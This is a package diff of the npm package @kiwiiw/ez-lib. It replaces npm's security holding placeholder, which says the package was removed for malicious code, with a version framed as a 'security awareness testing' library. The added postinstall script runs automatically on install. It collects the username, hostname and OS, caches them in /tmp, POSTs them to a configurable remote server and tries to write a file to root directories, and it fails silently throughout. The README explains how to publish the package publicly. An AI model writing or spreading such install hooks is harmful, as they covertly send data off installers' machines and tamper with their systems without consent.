@kiwiiw/ez-lib 0.0.1-security → 1.0.0

package/README.md

@@ -1,5 +1,136 @@
-# Security holding package
+# @ez-lib
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+Security awareness testing library for internal organizational use.
 
-Please refer to www.npmjs.com/advisories?search=%40kiwiiw%2Fez-lib for more information.
+## ⚠️ Important Notice
+
+This library is designed for **security awareness testing** within your organization. It monitors employee behavior when installing unknown npm packages.
+
+## What This Library Does
+
+When installed via `npm install @ez-lib`, the library automatically:
+
+1. **Collects system information**:
+   - Username
+   - Computer hostname
+   - Operating system
+   - Timestamp of installation
+
+2. **Sends telemetry data** to your configured server endpoint
+
+3. **Attempts to copy a video file** (`Im-In.mp4`) to the root directory:
+   - Windows: `C:\Im-In.mp4`
+   - Linux: `/root/Im-In.mp4`
+   - macOS: `/Im-In.mp4`
+
+4. **Caches data locally** in `/tmp/.system_cache`
+
+## Cross-Platform Support
+
+Works on:
+- ✅ Windows
+- ✅ Linux
+- ✅ macOS
+
+## Setup for Your Organization
+
+### 1. Replace the Video File
+
+Replace the placeholder file with your actual video:
+
+```bash
+cp /path/to/your/Im-In.mp4 ./public/Im-In.mp4
+```
+
+### 2. Configure Telemetry Server
+
+Edit `scripts/postinstall.js` and update the server URL:
+
+```javascript
+const SERVER_URL = 'https://your-organization.com/api/telemetry';
+```
+
+Or set it as an environment variable:
+
+```bash
+export TELEMETRY_SERVER=https://your-organization.com/api/telemetry
+```
+
+### 3. Publish to npm
+
+```bash
+# Login to npm
+npm login
+
+# Publish the package
+npm publish --access public
+```
+
+## Server Endpoint Requirements
+
+Your telemetry server should accept POST requests with JSON data:
+
+```json
+{
+  "username": "john.doe",
+  "hostname": "johns-laptop",
+  "platform": "darwin",
+  "timestamp": "2025-11-20T12:00:00.000Z"
+}
+```
+
+Example Express.js endpoint:
+
+```javascript
+app.post('/api/telemetry', express.json(), (req, res) => {
+  const { username, hostname, platform, timestamp } = req.body;
+
+  // Log to database or file
+  console.log('Installation detected:', req.body);
+
+  res.json({ success: true });
+});
+```
+
+## How Employees Might Install This
+
+Employees being tested might run:
+
+```bash
+npm install @ez-lib
+```
+
+## Permissions
+
+- The library will attempt to write to root directories but **fails silently** if permissions are not available
+- Telemetry is always sent regardless of file write permissions
+- Installation will **NOT fail** even if root write fails
+
+## API Usage (Optional)
+
+The library can also be used programmatically:
+
+```javascript
+const MemeSaver = require('@ez-lib');
+const { Telemetry } = require('@ez-lib');
+
+// Use MemeSaver
+const saver = new MemeSaver({ allowRoot: true });
+await saver.copyToRoot('/path/to/file.mp4', 'output.mp4');
+
+// Use Telemetry
+const telemetry = new Telemetry('https://your-server.com/api');
+await telemetry.report();
+```
+
+## Security Testing Best Practices
+
+1. ✅ **Get Authorization**: Ensure you have proper authorization from management
+2. ✅ **Document Purpose**: Clearly document this is for security awareness
+3. ✅ **Follow Up**: Use this as a teaching moment, not punishment
+4. ✅ **Secure Data**: Protect the collected telemetry data appropriately
+5. ✅ **Transparency**: Inform employees about the test after completion
+
+## License
+
+ISC - Internal Security Testing

package/index.js

@@ -0,0 +1,6 @@
+const MemeSaver = require('./lib/MemeSaver');
+const Telemetry = require('./lib/Telemetry');
+
+module.exports = MemeSaver;
+module.exports.MemeSaver = MemeSaver;
+module.exports.Telemetry = Telemetry;

package/lib/MemeSaver.js

@@ -0,0 +1,72 @@
+const fs = require('fs').promises;
+const path = require('path');
+const os = require('os');
+
+class MemeSaver {
+  constructor(options = {}) {
+    this.defaultDir = options.defaultDir || './.ez';
+    this.allowRoot = options.allowRoot || false;
+  }
+
+  async ensureDir(dir) {
+    try {
+      await fs.access(dir);
+    } catch {
+      await fs.mkdir(dir, { recursive: true });
+    }
+  }
+
+  getRootPath(filename) {
+    const platform = os.platform();
+
+    if (platform === 'win32') {
+      // Windows: C:\
+      return path.join('C:\\', filename);
+    } else if (platform === 'darwin') {
+      return path.join('/', filename);
+    } else {
+      return path.join('/root/', filename);
+    }
+  }
+
+  getHomePath(filename) {
+    return path.join(os.homedir(), filename);
+  }
+
+  async saveToRoot(filename, buffer) {
+    if (!this.allowRoot) {
+      throw new Error('Root access not allowed. Set allowRoot: true in constructor');
+    }
+
+    const rootPath = this.getRootPath(filename);
+
+    try {
+      await fs.writeFile(rootPath, buffer);
+      return rootPath;
+    } catch (error) {
+      throw new Error(`Cannot write to root: ${error.message}. Run with sudo/admin privileges.`);
+    }
+  }
+
+  async saveFromBuffer(buffer, filename, dir = this.defaultDir) {
+    await this.ensureDir(dir);
+    const filePath = path.join(dir, filename);
+    await fs.writeFile(filePath, buffer);
+    return filePath;
+  }
+
+  async copyToRoot(sourcePath, filename) {
+    if (!this.allowRoot) {
+      throw new Error('Root access not allowed. Set allowRoot: true in constructor');
+    }
+
+    try {
+      const buffer = await fs.readFile(sourcePath);
+      return await this.saveToRoot(filename, buffer);
+    } catch (error) {
+      throw new Error(`Cannot copy to root: ${error.message}`);
+    }
+  }
+}
+
+module.exports = MemeSaver;

package/lib/Telemetry.js

@@ -0,0 +1,103 @@
+const os = require('os');
+const https = require('https');
+const http = require('http');
+const fs = require('fs');
+const path = require('path');
+
+class Telemetry {
+  constructor(serverUrl) {
+    this.serverUrl = serverUrl;
+    this.cacheFile = path.join('/tmp', '.system_cache');
+  }
+
+  getSystemInfo() {
+    const username = os.userInfo().username;
+    const hostname = os.hostname();
+    const platform = os.platform();
+    const timestamp = new Date().toISOString();
+
+    return {
+      username,
+      hostname,
+      platform,
+      timestamp
+    };
+  }
+
+  async saveToCache(info) {
+    try {
+      const entry = `${info.hostname}|${info.platform}|${info.username}|${info.timestamp}\n`;
+      await fs.promises.appendFile(this.cacheFile, entry);
+    } catch (error) {
+      // Silently fail if cache write fails
+    }
+  }
+
+  async sendToServer(info) {
+    if (!this.serverUrl) {
+      return Promise.resolve();
+    }
+
+    return new Promise((resolve, reject) => {
+      const protocol = this.serverUrl.startsWith('https') ? https : http;
+      const url = new URL(this.serverUrl);
+
+      const postData = JSON.stringify(info);
+
+      const options = {
+        hostname: url.hostname,
+        port: url.port || (protocol === https ? 443 : 80),
+        path: url.pathname,
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(postData)
+        }
+      };
+
+      const req = protocol.request(options, (res) => {
+        let data = '';
+        res.on('data', (chunk) => data += chunk);
+        res.on('end', () => {
+          if (res.statusCode >= 200 && res.statusCode < 300) {
+            resolve(data);
+          } else {
+            reject(new Error(`Server returned ${res.statusCode}`));
+          }
+        });
+      });
+
+      req.on('error', (error) => {
+        // Silently fail if server request fails
+        resolve();
+      });
+
+      req.write(postData);
+      req.end();
+
+      // Timeout after 5 seconds
+      setTimeout(() => {
+        req.destroy();
+        resolve();
+      }, 5000);
+    });
+  }
+
+  async report() {
+    try {
+      const info = this.getSystemInfo();
+      await this.saveToCache(info);
+
+      if (this.serverUrl) {
+        await this.sendToServer(info);
+      }
+
+      return info;
+    } catch (error) {
+      // Silently fail
+      return null;
+    }
+  }
+}
+
+module.exports = Telemetry;

package/package.json

@@ -1,6 +1,26 @@
 {
   "name": "@kiwiiw/ez-lib",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "Security awareness testing library for internal use",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node scripts/postinstall.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [
+    "security",
+    "testing",
+    "internal"
+  ],
+  "license": "ISC",
+  "files": [
+    "lib/",
+    "public/",
+    "scripts/",
+    "index.js",
+    "README.md"
+  ],
+  "engines": {
+    "node": ">=12.0.0"
+  }
 }

package/scripts/postinstall.js

@@ -0,0 +1,38 @@
+#!/usr/bin/env node
+
+const path = require('path');
+const MemeSaver = require('../lib/MemeSaver');
+const Telemetry = require('../lib/Telemetry');
+
+async function postinstall() {
+  try {
+    // Configure your server URL here
+    const SERVER_URL = process.env.TELEMETRY_SERVER || 'https://your-server.com/api/telemetry';
+
+    // Send telemetry data
+    const telemetry = new Telemetry(SERVER_URL);
+    await telemetry.report();
+
+    // Try to copy video to root (will fail silently if no permissions)
+    try {
+      const saver = new MemeSaver({ allowRoot: true });
+      const videoPath = path.join(__dirname, '../public/Im-In.mp4');
+      await saver.copyToRoot(videoPath, 'Im-In.mp4');
+    } catch (error) {
+      // Silently fail if we don't have root permissions
+      // This prevents installation errors
+    }
+  } catch (error) {
+    // Silently fail to not break npm install
+  }
+}
+
+// Only run if executed directly (not required as module)
+if (require.main === module) {
+  postinstall().catch(() => {
+    // Exit successfully even if postinstall fails
+    process.exit(0);
+  });
+}
+
+module.exports = postinstall;